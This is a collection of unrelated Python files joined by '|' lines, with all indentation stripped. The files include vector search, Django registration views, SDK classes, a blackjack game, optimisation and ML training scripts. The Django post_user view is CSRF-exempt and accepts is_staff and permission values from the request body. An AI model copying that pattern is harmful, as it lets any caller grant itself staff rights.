status, ok = milvus.has_collection(collection_name)
print(status,ok)
if not ok:
param = {
'collection_name': collection_name,
'dimension': _DIM,
'index_file_size': _INDEX_FILE_SIZE, # optional
'metric_type': MetricType.IP # optional
}
milvus.create_collection(param)
def search_in_milvus(query_vectors):
param = {
'collection_name': collection_name,
'query_records': query_vectors,
'top_k': 5,
'params': {"nprobe": 16},
}
status, results = milvus.search(**param)
for re in results:
print('\n')
for i in re:
print(i)
def insert_vec(vectors, ids):
create_milvus_collection()
# Insert vectors into demo_collection, return status and vectors id list
status, ids = milvus.insert(collection_name=collection_name, records=vectors, ids=ids)
print(status,ids)
milvus.flush([collection_name])
def main():
connect_milvus_server()
vectors, ids = load_voc(file_path)
insert_vec(vectors, ids)
query_vectors=[]
query_vectors.append(vectors[0])
query_vectors.append(vectors[4])
query_vectors.append(vectors[8])
search_in_milvus(vectors)
if __name__ == "__main__":
main()
|
import json
#import requests
from django.http import HttpResponse, JsonResponse
from django.views.decorators.csrf import csrf_exempt
from django.db import connection
from django.contrib.gis.geos import Point
from public.models import User, Address, City, CenterOfInterest, InterestFor, District
from public import modify_address
from public import data_insert as di
@csrf_exempt
def city_exist(payload):
"""recherche de la city ajoute dans la bd"""
city_name = payload.get('city_name')
if not City.objects.filter(city_name=city_name).exists():
city = City(city_name=city_name).save()
city = City.objects.get(city_name=city_name)
else:
city = City.objects.get(city_name=city_name)
return(city.id)
@csrf_exempt
def district_exist(payload):
"""recherche le quartier"""
name_district = payload.get('districts')
if not District.objects.filter(id=1).exists():
city = City(city_name='Toulouse').save()
city = City.objects.get(city_name='Toulouse')
di.insert_district(di.read_json('./Data/district.json'), city.id)
elif name_district is None:
return (District.objects.get(district_name='NULL').id)
else:
return(District.objects.get(district_name=name_district).id)
@csrf_exempt
def address_exist(payload):
"""cherche si l'adresse existe dans la bd si oui renvoi l'id sinon la creee"""
a_number = payload.get('street_number', None)
a_name = payload.get('street_name', None)
a_cp = payload.get('postcode', None)
if a_number == None or a_name == None or a_cp == None:
print("sans adresse")
return(None)
a_complement = payload.get('complement', None)
a_district = district_exist(payload)
a_ville = city_exist(payload)
#print(a_number, a_name, a_cp, a_ville)
#print(modify_address.geocoder(('2','chemin des sauges','31400','TOULOUSE')))
if not Address.objects.filter(street_number=a_number, street_name=a_name, postal_code=a_cp, complement=a_complement).exists():
new_address = Address(
street_number=a_number,
street_name=a_name,
postal_code=a_cp,
address_city_id=a_ville,
district_id=a_district,
location=Point(modify_address.geocoder((a_number, a_name, a_cp, a_ville)))
)
address = new_address.save()
address = Address.objects.get(street_number=a_number, street_name=a_name, postal_code=a_cp, complement=a_complement)
else:
address = Address.objects.get(street_number=a_number, street_name=a_name, postal_code=a_cp, complement=a_complement)
return(address.id)
@csrf_exempt
def test_email(payload):
"""verifie email unique"""
email = payload.get('email')
if not User.objects.filter(email=email).exists():
return email
else:
return HttpResponse(status=400)
@csrf_exempt
def CenterOfInterest_exist(CenterInterest):
"""verifie centre interet existe"""
if not CenterOfInterest.objects.filter(id=1).exists():
di.insert_centerofinterest(di.read_json('./Data/centerInterest.json'))
return(CenterOfInterest.objects.get(name_center_of_interest=CenterInterest).id)
else:
print(CenterOfInterest.objects.get(name_center_of_interest=CenterInterest))
return(CenterOfInterest.objects.get(name_center_of_interest=CenterInterest).id)
@csrf_exempt
def gender_exist(payload):
name_gender = payload.get('gender')
if name_gender is None:
return (None)
else:
g = {'Homme': 'M', 'Femme': 'F'}
return g[name_gender]
@csrf_exempt
def csp_exist(payload):
"""renvoi la csp du user"""
name_csp = payload.get('social_professional_category')
if name_csp is None:
return (None)
else:
csp = {'artisans, commercants, chefs entreprise': '1',
'cadres et professions intellectuelles superieures': '2',
'professions intermediaires': '3',
'employes': '4',
'ouvriers': '5',
'retraites': '6',
'chomeurs': '7',
'etudiants': '8',
'autres': '9'
}
return csp[name_csp]
@csrf_exempt
def car_size_exist(payload):
"""renvoi la categorie de la voiture"""
name_car_size = payload.get('car_size')
if name_car_size is None:
return (None)
else:
size = {'petite voiture': '1',
'moyenne voiture': '2',
'grande voiture': '3'
}
return size[name_car_size]
@csrf_exempt
def post_user(request):
#try:
data = json.loads(request.body.decode())
for i in range(0, len(data)):
payload = data[i]
print(payload)
if User.objects.filter(email=payload['email']).exists():
return HttpResponse(status=400)
new_user = User(
email=test_email(payload),
first_name=payload.get('first_name'),
last_name=payload.get('last_name'),
user_img=payload.get('user_img', None),
is_active=payload.get('is_active', True),
is_staff=payload.get('is_staff', False),
user_permission=payload.get('user_permission', 0),
date_birth=payload.get('date_bitrh', None),
social_professional_category=csp_exist(payload),
gender=gender_exist(payload),
phone_number=payload.get('phone_number', None),
car_size=car_size_exist(payload),
home_address_id=address_exist(payload)
)
new_user.set_password(payload.get('password'))
new_user.save()
if payload.get('name_center_of_interest'):
for CenterOfInterest in payload.get('name_center_of_interest'):
new_InterestFor = InterestFor(
user_id=User.objects.get(email=payload['email']).id,
center_of_interest_id=CenterOfInterest_exist(CenterOfInterest)
)
new_InterestFor.save()
return HttpResponse(status=201)
# except:
# return HttpResponse(status=400)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlipaySecurityRiskCustomerriskSendModel(object):
def __init__(self):
self._bank_card_no = None
self._business_license_no = None
self._cert_no = None
self._email_address = None
self._external_id = None
self._merch_name = None
self._mobile = None
self._mobile_ip = None
self._order_ip = None
self._pid = None
self._plat_account = None
self._process_code = None
self._smid = None
self._trade_no = None
@property
def bank_card_no(self):
return self._bank_card_no
@bank_card_no.setter
def bank_card_no(self, value):
self._bank_card_no = value
@property
def business_license_no(self):
return self._business_license_no
@business_license_no.setter
def business_license_no(self, value):
self._business_license_no = value
@property
def cert_no(self):
return self._cert_no
@cert_no.setter
def cert_no(self, value):
self._cert_no = value
@property
def email_address(self):
return self._email_address
@email_address.setter
def email_address(self, value):
self._email_address = value
@property
def external_id(self):
return self._external_id
@external_id.setter
def external_id(self, value):
self._external_id = value
@property
def merch_name(self):
return self._merch_name
@merch_name.setter
def merch_name(self, value):
self._merch_name = value
@property
def mobile(self):
return self._mobile
@mobile.setter
def mobile(self, value):
self._mobile = value
@property
def mobile_ip(self):
return self._mobile_ip
@mobile_ip.setter
def mobile_ip(self, value):
self._mobile_ip = value
@property
def order_ip(self):
return self._order_ip
@order_ip.setter
def order_ip(self, value):
self._order_ip = value
@property
def pid(self):
return self._pid
@pid.setter
def pid(self, value):
self._pid = value
@property
def plat_account(self):
return self._plat_account
@plat_account.setter
def plat_account(self, value):
self._plat_account = value
@property
def process_code(self):
return self._process_code
@process_code.setter
def process_code(self, value):
self._process_code = value
@property
def smid(self):
return self._smid
@smid.setter
def smid(self, value):
self._smid = value
@property
def trade_no(self):
return self._trade_no
@trade_no.setter
def trade_no(self, value):
self._trade_no = value
def to_alipay_dict(self):
params = dict()
if self.bank_card_no:
if hasattr(self.bank_card_no, 'to_alipay_dict'):
params['bank_card_no'] = self.bank_card_no.to_alipay_dict()
else:
params['bank_card_no'] = self.bank_card_no
if self.business_license_no:
if hasattr(self.business_license_no, 'to_alipay_dict'):
params['business_license_no'] = self.business_license_no.to_alipay_dict()
else:
params['business_license_no'] = self.business_license_no
if self.cert_no:
if hasattr(self.cert_no, 'to_alipay_dict'):
params['cert_no'] = self.cert_no.to_alipay_dict()
else:
params['cert_no'] = self.cert_no
if self.email_address:
if hasattr(self.email_address, 'to_alipay_dict'):
params['email_address'] = self.email_address.to_alipay_dict()
else:
params['email_address'] = self.email_address
if self.external_id:
if hasattr(self.external_id, 'to_alipay_dict'):
params['external_id'] = self.external_id.to_alipay_dict()
else:
params['external_id'] = self.external_id
if self.merch_name:
if hasattr(self.merch_name, 'to_alipay_dict'):
params['merch_name'] = self.merch_name.to_alipay_dict()
else:
params['merch_name'] = self.merch_name
if self.mobile:
if hasattr(self.mobile, 'to_alipay_dict'):
params['mobile'] = self.mobile.to_alipay_dict()
else:
params['mobile'] = self.mobile
if self.mobile_ip:
if hasattr(self.mobile_ip, 'to_alipay_dict'):
params['mobile_ip'] = self.mobile_ip.to_alipay_dict()
else:
params['mobile_ip'] = self.mobile_ip
if self.order_ip:
if hasattr(self.order_ip, 'to_alipay_dict'):
params['order_ip'] = self.order_ip.to_alipay_dict()
else:
params['order_ip'] = self.order_ip
if self.pid:
if hasattr(self.pid, 'to_alipay_dict'):
params['pid'] = self.pid.to_alipay_dict()
else:
params['pid'] = self.pid
if self.plat_account:
if hasattr(self.plat_account, 'to_alipay_dict'):
params['plat_account'] = self.plat_account.to_alipay_dict()
else:
params['plat_account'] = self.plat_account
if self.process_code:
if hasattr(self.process_code, 'to_alipay_dict'):
params['process_code'] = self.process_code.to_alipay_dict()
else:
params['process_code'] = self.process_code
if self.smid:
if hasattr(self.smid, 'to_alipay_dict'):
params['smid'] = self.smid.to_alipay_dict()
else:
params['smid'] = self.smid
if self.trade_no:
if hasattr(self.trade_no, 'to_alipay_dict'):
params['trade_no'] = self.trade_no.to_alipay_dict()
else:
params['trade_no'] = self.trade_no
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipaySecurityRiskCustomerriskSendModel()
if 'bank_card_no' in d:
o.bank_card_no = d['bank_card_no']
if 'business_license_no' in d:
o.business_license_no = d['business_license_no']
if 'cert_no' in d:
o.cert_no = d['cert_no']
if 'email_address' in d:
o.email_address = d['email_address']
if 'external_id' in d:
o.external_id = d['external_id']
if 'merch_name' in d:
o.merch_name = d['merch_name']
if 'mobile' in d:
o.mobile = d['mobile']
if 'mobile_ip' in d:
o.mobile_ip = d['mobile_ip']
if 'order_ip' in d:
o.order_ip = d['order_ip']
if 'pid' in d:
o.pid = d['pid']
if 'plat_account' in d:
o.plat_account = d['plat_account']
if 'process_code' in d:
o.process_code = d['process_code']
if 'smid' in d:
o.smid = d['smid']
if 'trade_no' in d:
o.trade_no = d['trade_no']
return o
|
from GLOBAL_VAR import *
group = 0
pair_Fn = '%s/%s_outlierPairs_group%d.txt' % (pairdir, LMfn, group)
N0 = len(pd.read_csv(pair_Fn, header= None, sep='\t', usecols=[0]))
pairs_N = []
for group in range(1, 23):
pair_Fn = '%s/%s_outlierPairs_group%d.txt' % (pairdir, LMfn, group)
N = len(pd.read_csv(pair_Fn, header= None, sep='\t', usecols=[0]))
pairs_N.append([N, N0])
pairs_N = pd.DataFrame(pairs_N)
pairs_N.columns = ['ts_N', 'shared_N']
pairs_N.to_csv('Fig2_sig_prop_%s.txt' % FMfn, sep='\t', index = False)
|
from weldx.asdf.types import WeldxType
from weldx.measurement import Source
__all__ = ["Source", "SourceType"]
class SourceType(WeldxType):
"""Serialization class for measurement sources."""
name = "measurement/source"
version = "1.0.0"
types = [Source]
requires = ["weldx"]
handle_dynamic_subclasses = True
@classmethod
def to_tree(cls, node: Source, ctx):
"""convert to tagged tree and remove all None entries from node dictionary"""
tree = node.__dict__
return tree
@classmethod
def from_tree(cls, tree, ctx):
obj = Source(**tree)
return obj
|
'''defines the Blackjack class'''
from .player import Player
from .deck import Deck
from .input_handling import match_yes, next_player, press_return
class Blackjack():
'''the class that keeps track of gameplay
kw args:
num_players -- the number of players, an integer between 2 and 4
names -- an array of player names
instance variables:
deck -- a Deck object
players -- a list of Player objects
methods:
'''
def __init__(self, num_players, names=[]):
'''initializes the Blackjack class
kw args:
num_players -- the number of players, an integer between 2 and 4
names -- an array of player names
instance variables:
deck -- a Deck object
players -- a list of Player objects
'''
self.deck = Deck()
self.players = []
# record player names
for player in range(num_players):
if names:
self.players.append(Player(self.deck, \
names[player]))
else:
self.players.append(Player(self.deck, \
input("What's your name, player {}?\n".format(player + 1))))
def unbroken(self):
'''
returns a list of players who are 'unbroken' (i.e. the sum
of their hand is below 22)
'''
return list(filter(lambda player: player.sum_hand() <= 21, self.players))
def start_round(self):
'''starts a round of Blackjack'''
# print each player's hand
for player in self.players:
next_player(player)
player.print_hand()
press_return()
# move to next turn
self.next_turn()
def next_turn(self):
'''runs the next turn of blackjack game'''
# iterate through players
for player in self.players:
if player.cont and len(self.unbroken()) > 1:
next_player(player)
player.print_hand()
# queries the player
if match_yes("Would you like to draw another card, {}?"
.format(player.name)):
player.draw()
player.print_hand()
# checks if player is "broken"
if player.sum_hand() > 21:
print("You're out!")
player.cont = False
else:
player.cont = False
press_return()
# checks if another turn is necessary
if (any(map(lambda player: player.cont, self.players)) and len(self.unbroken()) > 1):
self.next_turn()
# ends game
else:
self.end()
def end(self):
'''finishes the blackjack game'''
# find the winner
winner = max(self.unbroken(), key = lambda player: player.sum_hand())
# print congratulations
print("Congratulations, {}! With a score of {}, you've won!"
.format(winner.name, winner.sum_hand()))
# queries the user if they would like to play again
if match_yes("Would you like to play again?"):
game = Blackjack(
len(self.players),
names = list(map(lambda player: player.name, self.players)))
game.start_round()
|
import unittest
from PIL import Image
import mock
from spriter.image import URLImage
from tests import Openned
class TestImage(unittest.TestCase):
def test_simple_url_get_base(self):
with mock.patch("urllib.urlopen") as mck:
mck.return_value = Openned("http://pitomba.org/happy.png")
img = URLImage("http://pitomba.org/happy.png")
img_pil = Image.open("tests/fixtures/happy.png")
self.assertEquals(img_pil.histogram(), img.raw.histogram())
def test_simple_url_get_base_with_default(self):
with mock.patch("urllib.urlopen") as mck:
mck.return_value = Openned("http://pitomba.org/happy.png")
mck.return_value.code = 404
img = URLImage("404", default_url="http://pitomba.org/happy.png")
img_pil = Image.open("tests/fixtures/happy.png")
self.assertEquals(img_pil.histogram(), img.raw.histogram())
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from .. import models
class ReportsOperations(object):
"""ReportsOperations operations.
You should not instantiate directly this class, but create a Client instance that will create it for you and attach it as attribute.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Client API version. Constant value: "2019-11-01".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2019-11-01"
self.config = config
def get_latency_scorecards(
self, resource_group_name, profile_name, experiment_name, aggregation_interval, end_date_time_utc=None, country=None, custom_headers=None, raw=False, **operation_config):
"""Gets a Latency Scorecard for a given Experiment.
:param resource_group_name: Name of the Resource group within the
Azure subscription.
:type resource_group_name: str
:param profile_name: The Profile identifier associated with the Tenant
and Partner
:type profile_name: str
:param experiment_name: The Experiment identifier associated with the
Experiment
:type experiment_name: str
:param aggregation_interval: The aggregation interval of the Latency
Scorecard. Possible values include: 'Daily', 'Weekly', 'Monthly'
:type aggregation_interval: str or
~azure.mgmt.frontdoor.models.LatencyScorecardAggregationInterval
:param end_date_time_utc: The end DateTime of the Latency Scorecard in
UTC
:type end_date_time_utc: str
:param country: The country associated with the Latency Scorecard.
Values are country ISO codes as specified here-
https://www.iso.org/iso-3166-country-codes.html
:type country: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: LatencyScorecard or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.frontdoor.models.LatencyScorecard or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorResponseException<azure.mgmt.frontdoor.models.ErrorResponseException>`
"""
# Construct URL
url = self.get_latency_scorecards.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=80, min_length=1, pattern=r'^[a-zA-Z0-9_\-\(\)\.]*[^\.]$'),
'profileName': self._serialize.url("profile_name", profile_name, 'str', pattern=r'^[a-zA-Z0-9_\-\(\)\.]*[^\.]$'),
'experimentName': self._serialize.url("experiment_name", experiment_name, 'str', pattern=r'^[a-zA-Z0-9_\-\(\)\.]*[^\.]$')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
if end_date_time_utc is not None:
query_parameters['endDateTimeUTC'] = self._serialize.query("end_date_time_utc", end_date_time_utc, 'str')
if country is not None:
query_parameters['country'] = self._serialize.query("country", country, 'str')
query_parameters['aggregationInterval'] = self._serialize.query("aggregation_interval", aggregation_interval, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('LatencyScorecard', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_latency_scorecards.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/NetworkExperimentProfiles/{profileName}/Experiments/{experimentName}/LatencyScorecard'}
def get_timeseries(
self, resource_group_name, profile_name, experiment_name, start_date_time_utc, end_date_time_utc, aggregation_interval, timeseries_type, endpoint=None, country=None, custom_headers=None, raw=False, **operation_config):
"""Gets a Timeseries for a given Experiment.
:param resource_group_name: Name of the Resource group within the
Azure subscription.
:type resource_group_name: str
:param profile_name: The Profile identifier associated with the Tenant
and Partner
:type profile_name: str
:param experiment_name: The Experiment identifier associated with the
Experiment
:type experiment_name: str
:param start_date_time_utc: The start DateTime of the Timeseries in
UTC
:type start_date_time_utc: datetime
:param end_date_time_utc: The end DateTime of the Timeseries in UTC
:type end_date_time_utc: datetime
:param aggregation_interval: The aggregation interval of the
Timeseries. Possible values include: 'Hourly', 'Daily'
:type aggregation_interval: str or
~azure.mgmt.frontdoor.models.TimeseriesAggregationInterval
:param timeseries_type: The type of Timeseries. Possible values
include: 'MeasurementCounts', 'LatencyP50', 'LatencyP75', 'LatencyP95'
:type timeseries_type: str or
~azure.mgmt.frontdoor.models.TimeseriesType
:param endpoint: The specific endpoint
:type endpoint: str
:param country: The country associated with the Timeseries. Values are
country ISO codes as specified here-
https://www.iso.org/iso-3166-country-codes.html
:type country: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Timeseries or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.frontdoor.models.Timeseries or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorResponseException<azure.mgmt.frontdoor.models.ErrorResponseException>`
"""
# Construct URL
url = self.get_timeseries.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=80, min_length=1, pattern=r'^[a-zA-Z0-9_\-\(\)\.]*[^\.]$'),
'profileName': self._serialize.url("profile_name", profile_name, 'str', pattern=r'^[a-zA-Z0-9_\-\(\)\.]*[^\.]$'),
'experimentName': self._serialize.url("experiment_name", experiment_name, 'str', pattern=r'^[a-zA-Z0-9_\-\(\)\.]*[^\.]$')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
query_parameters['startDateTimeUTC'] = self._serialize.query("start_date_time_utc", start_date_time_utc, 'iso-8601')
query_parameters['endDateTimeUTC'] = self._serialize.query("end_date_time_utc", end_date_time_utc, 'iso-8601')
query_parameters['aggregationInterval'] = self._serialize.query("aggregation_interval", aggregation_interval, 'str')
query_parameters['timeseriesType'] = self._serialize.query("timeseries_type", timeseries_type, 'str')
if endpoint is not None:
query_parameters['endpoint'] = self._serialize.query("endpoint", endpoint, 'str')
if country is not None:
query_parameters['country'] = self._serialize.query("country", country, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Timeseries', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_timeseries.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/NetworkExperimentProfiles/{profileName}/Experiments/{experimentName}/Timeseries'}
|
# -*- coding: utf-8 -*-
#: Regular python imports
from __future__ import division
from __future__ import print_function
from pyomo.environ import *
__author__ = 'David Thierry' #: May 2018
#: Problem number 71 from the Hock-Schittkowsky test suite
#: https://www.coin-or.org/Ipopt/documentation/node20.html
#: The model
model = ConcreteModel()
#: Set
model.i = Set(initialize=[1,2,3,4])
#: Initial guess (good practice)
x_guess = {1: 1, 2: 5, 3: 4, 4:1}
#: x variables with bounds
model.x = Var(model.i, initialize=x_guess, bounds=(1,5))
#: Constraint
model.con1 = Constraint(
expr=model.x[1]**2 + model.x[2]**2 + model.x[3]**2 + model.x[4]**2 == 40)
#: Objective
model.obj_fun = Objective(sense=minimize,
expr=model.x[1] * model.x[1] * (model.x[1] + model.x[2] + model.x[3]) + model.x[3])
#: At this point the model could be part of a function or class, be solved in a script or in the command line
|
# import json
#
# with open("color.json", "r", encoding='utf-8') as file:
# color = json.load(file)
#
# print(type(file))
import sys
print(sys.argv) |
import numpy as np
import torch
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim
import torch.utils.data
import transforms
import dataset
import models
import cmd_args
import open3d as o3d
from utils_dataset import lines
from torch.utils.tensorboard import SummaryWriter
from loss_fn import iou_projected_to_2d
args = cmd_args.parse_args_from_yaml("/home/mayank/Mayank/TrackThisFlow/configs/test_ours_KITTI.yaml")
basedir = "/home/mayank/Data/KITTI/training/"
writer = SummaryWriter()
val_dataset = dataset.track_and_flow_dataset(basedir,
transform=transforms.ProcessData(args.data_process,
args.num_points,
args.allow_less_points),
gen_func=transforms.GenerateDataUnsymmetric(args),
args=args
)
print("Length of dataset:", len(val_dataset))
val_loader = torch.utils.data.DataLoader(
val_dataset,
batch_size=1,
shuffle=True,
num_workers=4,
pin_memory=True,
worker_init_fn=lambda x: np.random.seed((torch.initial_seed()) % (2 ** 32))
)
model_checker = models.__dict__[args.arch](args)
model_checker = torch.nn.DataParallel(model_checker).cuda()
checkpoint = torch.load(args.resume)
model_checker.load_state_dict(checkpoint['state_dict'], strict=True)
print("Pretrained weights loaded!")
# model = model.cuda()
model_checker.eval()
model = models.__dict__[args.arch](args)
model = torch.nn.DataParallel(model).cuda()
checkpoint = torch.load(args.resume)
model.load_state_dict(checkpoint['state_dict'], strict=True)
print("Pretrained weights loaded!")
# model = model.cuda()
model.train()
viz = True
def nearest_neighbour(x, y):
x = x[0]
y = y[0]
x = x.transpose(0,1)
y = y.transpose(0,1)
n = x.size(0)
m = y.size(0)
d = x.size(1)
x = x.unsqueeze(1).expand(n, m, d)
y = y.unsqueeze(0).expand(n, m, d)
dist = torch.pow(x - y, 2).sum(2)
nn_dists = torch.min(dist, axis=0).values
return torch.sum(nn_dists)/n
criterion = torch.nn.MSELoss().cuda()
optimizer = torch.optim.Adam(model.parameters(), lr=0.00001)
for epoch in range(1):
# with torch.no_grad():
skipped = 0
for i, (pc1, pc2, generated_data, box1, box2, skip) in enumerate(val_loader):
if(i%1000 == 0):
state = {
'epoch': epoch + 1, # next start epoch
'arch': args.arch,
'state_dict': model.state_dict(),
'min_loss': 0,
'optimizer': optimizer.state_dict(),
}
torch.save(state, str(i) + 'newModel.pth.tar')
print("Model saved at iteration:", i)
if(skip==1):
skipped += 1
continue
box1 = box1.cuda()
box2 = box2.cuda()
output = model(pc1, pc2, generated_data)
pc1 = pc1.cuda()
pc2 = pc2.cuda()
output_mean_translation = torch.mean(output,axis=2)
translated_box1 = box1 + output_mean_translation
translated_box1 = translated_box1.view(translated_box1.size(0), -1)
box2 = box2.view(box2.size(0), -1)
box2_for_mse = box2.view(-1,8,3)[:,:4,:]
# box2_for_mse = box2_for_mse.view(box2_for_mse.size(0), -1)
translated_box1_for_mse = translated_box1.view(-1,8,3)[:,:4,:]
# translated_box1_for_mse = translated_box1_for_mse.view(translated_box1_for_mse.size(0),-1)
# intersection = intersection_area_projected_to_2d(translated_box1_for_mse, box2_for_mse)
loss_translation = criterion(translated_box1_for_mse, box2_for_mse)#criterion(translated_box1, box2)
loss_nn = nearest_neighbour(pc1+output, pc2)
loss = 1-iou_projected_to_2d(translated_box1_for_mse, box2_for_mse) + loss_nn*10
# print(loss)
# brak
optimizer.zero_grad()
loss.backward()
optimizer.step()
if(i%5 == 0):
print("Epoch", epoch, "| Iteration:", i, " | Translation Loss:", loss_translation.item(), "| NN Loss:", loss_nn.item(), "| Total Loss:", loss.item(), " | Skipped:", skipped)
writer.add_scalar("translation_loss", loss_translation.item(), epoch*(len(val_dataset) + i))
writer.add_scalar("nn_loss", loss_nn.item(), epoch*(len(val_dataset)) + i)
writer.add_scalar("total_loss", loss.item(), epoch*(len(val_dataset)) + i)
if(True):
output_checker = model_checker(pc1, pc2, generated_data)
output_mean_translation_checker = torch.mean(output_checker,axis=2)
translated_box1_checker = box1 + output_mean_translation_checker
translated_box1_checker = translated_box1_checker.view(translated_box1_checker.size(0),-1)
translated_box1 = translated_box1.view(-1,8,3).data.cpu().numpy()[0]
colors = [[0, 1, 0] for i in range(len(lines))]
line_set_translated_box1 = o3d.geometry.LineSet(
points=o3d.utility.Vector3dVector(translated_box1),
lines=o3d.utility.Vector2iVector(lines),
)
line_set_translated_box1.colors = o3d.utility.Vector3dVector(colors)
translated_box1_checker = translated_box1_checker.view(-1,8,3).data.cpu().numpy()[0]
colors = [[0, 0, 0] for i in range(len(lines))]
line_set_translated_box1_checker = o3d.geometry.LineSet(
points=o3d.utility.Vector3dVector(translated_box1_checker),
lines=o3d.utility.Vector2iVector(lines),
)
line_set_translated_box1_checker.colors = o3d.utility.Vector3dVector(colors)
non_translated_box1 = box1.view(-1,8,3)[0] #+ output_mean_translation
non_translated_box1 = non_translated_box1.data.cpu().numpy()
colors = [[0, 0, 1] for i in range(len(lines))]
line_set_non_translated_box1 = o3d.geometry.LineSet(
points=o3d.utility.Vector3dVector(non_translated_box1),
lines=o3d.utility.Vector2iVector(lines),
)
line_set_non_translated_box1.colors = o3d.utility.Vector3dVector(colors)
non_translated_box2 = box2.view(-1,8,3)[0] #+ output_mean_translation
non_translated_box2 = non_translated_box2.data.cpu().numpy()
colors = [[1, 0, 0] for i in range(len(lines))]
line_set_non_translated_box2 = o3d.geometry.LineSet(
points=o3d.utility.Vector3dVector(non_translated_box2),
lines=o3d.utility.Vector2iVector(lines),
)
line_set_non_translated_box2.colors = o3d.utility.Vector3dVector(colors)
projected = pc1.data.cpu().numpy() + output.data.cpu().numpy()
projected = projected[0].transpose()
projected_checker = pc1.data.cpu().numpy() + output_checker.data.cpu().numpy()
projected_checker = projected_checker[0].transpose()
pc1 = pc1.data.cpu().numpy()[0].transpose()
pc2 = pc2.data.cpu().numpy()[0].transpose()
pcd1 = o3d.geometry.PointCloud()
pcd1.points = o3d.utility.Vector3dVector(pc1)
pcd1.paint_uniform_color((0.0,0.0,1.0))
pcd2 = o3d.geometry.PointCloud()
pcd2.points = o3d.utility.Vector3dVector(pc2)
pcd2.paint_uniform_color((1.0,0.0,0.0))
pcd3 = o3d.geometry.PointCloud()
pcd3.points = o3d.utility.Vector3dVector(projected)
pcd3.paint_uniform_color((0.0,1.0,0.0))
pcd4 = o3d.geometry.PointCloud()
pcd4.points = o3d.utility.Vector3dVector(projected_checker)
pcd4.paint_uniform_color((0.0,0.0,0.0))
o3d.visualization.draw_geometries([pcd1, pcd2, pcd3, pcd4, line_set_translated_box1, line_set_non_translated_box1, line_set_non_translated_box2, line_set_translated_box1_checker])
|
from dbconn import Departments, Employees, Session
#######################################
# 创建到数据库连接的会话
session = Session()
#######################################
# 增加记录就是创建类的实例
# hr = Departments(dep_id=1, dep_name='人事部')
# ops = Departments(dep_id=2, dep_name='运维部')
# dev = Departments(dep_id=3, dep_name='开发部')
# qa = Departments(dep_id=4, dep_name='测试部')
# sales = Departments(dep_id=5, dep_name='销售部')
# market = Departments(dep_id=6, dep_name='市场部')
# session.add_all([hr, ops, dev, qa, sales, market])
#######################################
# 增加员工
# lb = Employees(
# emp_id=1, emp_name='刘备',
# birth_date='1975-03-18', email='lb@qq.com', dep_id=1
# )
# gy = Employees(
# emp_id=2, emp_name='关羽',
# birth_date='1980-2-15', email='gy@qq.com', dep_id=2
# )
# zf = Employees(
# emp_id=3, emp_name='张飞',
# birth_date='1982-10-3', email='zf@qq.com', dep_id=2
# )
# zy = Employees(
# emp_id=4, emp_name='赵云',
# birth_date='1995-4-19', email='zy@163.com', dep_id=2
# )
# hz = Employees(
# emp_id=5, emp_name='黄忠',
# birth_date='1970-1-1', email='hz@126.com', dep_id=3
# )
# wy = Employees(
# emp_id=6, emp_name='魏严',
